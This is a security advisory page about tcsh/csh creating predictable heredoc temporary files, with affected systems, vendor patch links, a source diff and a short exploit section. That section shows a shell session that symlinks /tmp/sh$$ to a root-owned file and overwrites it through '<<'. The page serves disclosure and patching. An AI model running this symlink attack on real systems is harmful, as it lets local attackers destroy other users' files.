SecuriTeam - tcsh/csh creates insecure temporary file (Patch available)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

Tcsh is an updated version of the traditional BSD C Shell (csh). Versions of csh and tcsh are included in the FreeBSD ports collection (tcsh, 44bsd-csh) and the FreeBSD base system (csh, tcsh).
A security problem arises with the way csh and tcsh create temporary files when the '<<' operator is used, which may allow local attackers to create a denial of service attack against the machine.

Credit:
The information has been provided by Debian security announce, FreeBSD Security Advisories, Kris Kennaway and proton.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
FreeBSD 4.x, 3.x prior to the correction date.
Debian GNU/Linux 2.2
Red Hat Linux 5.2 - i386, alpha, sparc
Red Hat Linux 6.0 - i386, alpha, sparc
Red Hat Linux 6.1 - i386, alpha, sparc
Red Hat Linux 6.2 - i386, alpha, sparc
Red Hat Linux 6.2EE - i386, alpha, sparc
Red Hat Linux 7.0 - i386, alpha
Red Hat Linux 7.0J - i386, alpha

Corrected:
2000-11-04 (FreeBSD 4.1.1-STABLE)
2000-11-05 (FreeBSD 3.5.1-STABLE)

The csh and tcsh code creates temporary files when the '<<' operator is used, however these are created insecurely and use a predictable filename based on the process ID of the shell. An attacker can exploit this vulnerability to overwrite an arbitrary file writable by the user running the shell. The contents of the file are overwritten with the text being entered using the '<<' operator, so it will usually not be under the control of the attacker.

Therefore, the likely impact of this vulnerability is a denial of service since the attacker can cause critical files writable by the user to be overwritten. It is unlikely, although possible depending on the circumstances in which the '<<' operator is used, that the attacker could exploit the vulnerability to gain privileges (this typically requires that they have control over the contents the target file is overwritten with).

Patch:
Debian GNU/Linux 2.2 alias potato
Potato was released for the alpha, arm, i386, m68k, PowerPC and Sparc architectures.

Source archives:
http://security.debian.org/dists/stable/updates/main/source/tcsh_6.09.00-10.diff.gz
http://security.debian.org/dists/stable/updates/main/source/tcsh_6.09.00-10.dsc
http://security.debian.org/dists/stable/updates/main/source/tcsh_6.09.00.orig.tar.gz

Architecture independent archives:
http://security.debian.org/dists/stable/updates/main/binary-all/tcsh-i18n_6.09.00-10_all.deb

Alpha architecture:
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh-kanji_6.09.00-10_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh_6.09.00-10_alpha.deb

ARM architecture:
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-kanji_6.09.00-10_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6.09.00-10_arm.deb

Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh-kanji_6.09.00-10_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_6.09.00-10_i386.deb

Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh-kanji_6.09.00-10_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_6.09.00-10_m68k.deb

PowerPC architecture:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh-kanji_6.09.00-10_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh_6.09.00-10_powerpc.deb

Sun Sparc architecture: http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh-kanji_6.09.00-10_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh_6.09.00-10_sparc.deb

Solution (FreeBSD):
Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE after the correction date, or patch your present system source code and rebuild.

To patch your present system: download the relevant patch from the below location, and execute the following commands as root:

[FreeBSD 4.x base system]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:76/tcsh.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:76/tcsh.patch.asc

Verify the detached PGP signature using your PGP utility.

cd /usr/src/contrib/tcsh
patch -p < /path/to/patch
cd /usr/src/bin/csh
make depend && make all install

[FreeBSD 3.x base system]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:76/csh.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:76/csh.patch.asc

Verify the detached PGP signature using your PGP utility.

cd /usr/src/bin/csh
patch -p < /path/to/patch
make depend && make all install

[Ports collection]

One of the following:

1) Upgrade your entire ports collection and rebuild the tcsh/44bsd-csh port.

2) Deinstall the old package and install a new package dated after the correction date, obtained from:

[tcsh]

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/shells/tcsh-6.09.03_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/shells/tcsh-6.09.03_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/shells/tcsh-6.09.03_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/shells/tcsh-6.09.03_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/shells/tcsh-6.09.03_1.tgz

[44bsd-csh]

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/shells/44bsd-csh-20001106.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/shells/44bsd-csh-20001106.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/shells/44bsd-csh-20001106.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/shells/44bsd-csh-20001106.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/shells/44bsd-csh-20001106.tgz

3) Download a new port skeleton for the tcsh/44bsd-csh port from:

http://www.freebsd.org/ports/

And use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

Redhat
Red Hat Linux 5.2:

alpha:
ftp://updates.redhat.com/5.2/alpha/tcsh-6.10-0.5.x.alpha.rpm

sparc:
ftp://updates.redhat.com/5.2/sparc/tcsh-6.10-0.5.x.sparc.rpm

i386:
ftp://updates.redhat.com/5.2/i386/tcsh-6.10-0.5.x.i386.rpm

sources:
ftp://updates.redhat.com/5.2/SRPMS/tcsh-6.10-0.5.x.src.rpm

Red Hat Linux 6.0:

sparc:
ftp://updates.redhat.com/6.0/sparc/tcsh-6.10-0.6.x.sparc.rpm

i386:
ftp://updates.redhat.com/6.0/i386/tcsh-6.10-0.6.x.i386.rpm

alpha:
ftp://updates.redhat.com/6.0/alpha/tcsh-6.10-0.6.x.alpha.rpm

sources:
ftp://updates.redhat.com/6.0/SRPMS/tcsh-6.10-0.6.x.src.rpm

Red Hat Linux 6.1:

alpha:
ftp://updates.redhat.com/6.1/alpha/tcsh-6.10-0.6.x.alpha.rpm

sparc:
ftp://updates.redhat.com/6.1/sparc/tcsh-6.10-0.6.x.sparc.rpm

i386:
ftp://updates.redhat.com/6.1/i386/tcsh-6.10-0.6.x.i386.rpm

sources:
ftp://updates.redhat.com/6.1/SRPMS/tcsh-6.10-0.6.x.src.rpm

Red Hat Linux 6.2:

alpha:
ftp://updates.redhat.com/6.2/alpha/tcsh-6.10-0.6.x.alpha.rpm

sparc:
ftp://updates.redhat.com/6.2/sparc/tcsh-6.10-0.6.x.sparc.rpm

i386:
ftp://updates.redhat.com/6.2/i386/tcsh-6.10-0.6.x.i386.rpm

sources:
ftp://updates.redhat.com/6.2/SRPMS/tcsh-6.10-0.6.x.src.rpm

Red Hat Linux 7.0:

alpha:
ftp://updates.redhat.com/7.0/alpha/tcsh-6.10-1.alpha.rpm

i386:
ftp://updates.redhat.com/7.0/i386/tcsh-6.10-1.i386.rpm

sources:
ftp://updates.redhat.com/7.0/SRPMS/tcsh-6.10-1.src.rpm

General Patch:
Index: sh.dol.c
===================================================================
RCS file: /mnt/ncvs/src/contrib/tcsh/sh.dol.c,v
retrieving revision 1.1.1.3.2.1
diff -u -r1.1.1.3.2.1 sh.dol.c
--- sh.dol.c 2000/06/10 22:25:57 1.1.1.3.2.1
+++ sh.dol.c 2000/11/04 22:23:29
@@ -1,4 +1,4 @@
-/* $Header: /src/pub/tcsh/sh.dol.c,v 3.40 2000/06/10 21:36:06 kim Exp $ */
+/* $Header: /src/pub/tcsh/sh.dol.c,v 3.42 2000/10/31 16:55:52 christos Exp $ */
/*
  * sh.dol.c: Variable substitutions
  */
@@ -36,7 +36,7 @@
  */
#include "sh.h"

-RCSID("$Id: sh.dol.c,v 3.40 2000/06/10 21:36:06 kim Exp $")
+RCSID("$Id: sh.dol.c,v 3.42 2000/10/31 16:55:52 christos Exp $")

/*
  * C shell
@@ -1017,7 +1017,7 @@
heredoc(term)
     Char *term;
{
- register int c;
+ int c;
     Char *Dv[2];
     Char obuf[BUFSIZE], lbuf[BUFSIZE], mbuf[BUFSIZE];
     int ocnt, lcnt, mcnt;
@@ -1025,7 +1025,9 @@
     Char **vp;
     bool quoted;
     char *tmp;
+ struct timeval tv;

+again:
     tmp = short2str(shtemp);
#ifndef O_CREAT
# define O_CREAT 0
@@ -1036,12 +1038,22 @@
#ifndef O_TEMPORARY
# define O_TEMPORARY 0
#endif
- if (open(tmp, O_RDWR|O_CREAT|O_TEMPORARY) < 0) {
- int oerrno = errno;
-
+#ifndef O_EXCL
+# define O_EXCL 0
+#endif
+ if (open(tmp, O_RDWR|O_CREAT|O_EXCL|O_TEMPORARY) == -1) {
+ int oerrno = errno;
+ if (errno == EEXIST) {
+ if (unlink(tmp) == -1) {
+ (void) gettimeofday(&tv, NULL);
+ shtemp = Strspl(STRtmpsh, putn((((int)tv.tv_sec) ^
+ ((int)tv.tv_usec) ^ ((int)doldol)) & 0x00ffffff));
+ }
+ goto again;
+ }
(void) unlink(tmp);
errno = oerrno;
- stderror(ERR_SYSTEM, tmp, strerror(errno));
+ stderror(ERR_SYSTEM, tmp, strerror(errno));
     }
     (void) unlink(tmp); /* 0 0 inode! */
     Dv[0] = term;

Exploit:
/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 ->
rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#

blog comments powered by Disqus

	ProFTPD Response Pool Use-After-Free Code Execution Vulnerability
	Insight Control for Linux Multiple Vulnerabilities
	HP-UX Running NFS/ONCplus Denial of Service Vulnerability
	HP-UX Running BIND Denial of Service Vulnerability 2011
	HP-UX Running XNTP Denial of Service Vulnerability
	HP-UX Denial of Service Vulnerability
	Webkit Detached Body Element Code Execution Vulnerability
	Mac OS X Compact Font Format Decoder Code Execution Vulnerability
	WebKit WBR Tag Removal Code Execution Vulnerability
	Webkit Undefined DOM Prototype Attach Code Execution Vulnerability
	Apple HFS Information Disclosure Vulnerability
	XPDF arbitrary Arbitrary Code Execution Vulnerabilities
	Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability
	Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability
	HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities